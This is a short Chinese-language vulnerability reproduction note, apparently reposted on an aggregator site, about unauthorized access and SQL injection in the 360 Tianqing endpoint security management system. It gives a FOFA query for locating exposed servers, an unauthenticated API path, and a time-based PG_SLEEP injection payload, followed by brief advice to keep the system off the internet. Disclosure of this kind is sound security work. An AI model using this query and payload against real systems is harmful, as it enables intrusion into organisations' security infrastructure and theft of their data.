天擎终端安全管理系统未授权访问&SQL注入漏洞
Posted 水中煮鱼冒气
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了天擎终端安全管理系统未授权访问&SQL注入漏洞相关的知识,希望对你有一定的参考价值。
漏洞名称
- 天擎终端安全管理系统未授权访问&SQL注入漏洞
漏洞描述
- 天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。
- 该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护;
- 天擎终端安全管理系统存在未授权访问和SQL注入,可获取大量节点信息以及数据库信息。
影响版本
- 天擎终端安全管理系统
FOFA
app="360天擎终端安全管理系统"
漏洞复现
未授权复现
第一步 查看漏洞点
/api/dbstat/gettablessize
第二步 查看越权访问
sql注入复现
第一步 sql注入点
/api/dp/rptsvcsyncpoint?ccid=1
第二步 延时注入
/api/dp/rptsvcsyncpoint?ccid=1%27;SELECT%20PG_SLEEP(1)--
修复建议
- 厂商暂未给出修复建议。
- 建议用户将该系统放置在内网,不要暴露在互联网,同时禁止未授权访问相关文件
以上是关于天擎终端安全管理系统未授权访问&SQL注入漏洞的主要内容,如果未能解决你的问题,请参考以下文章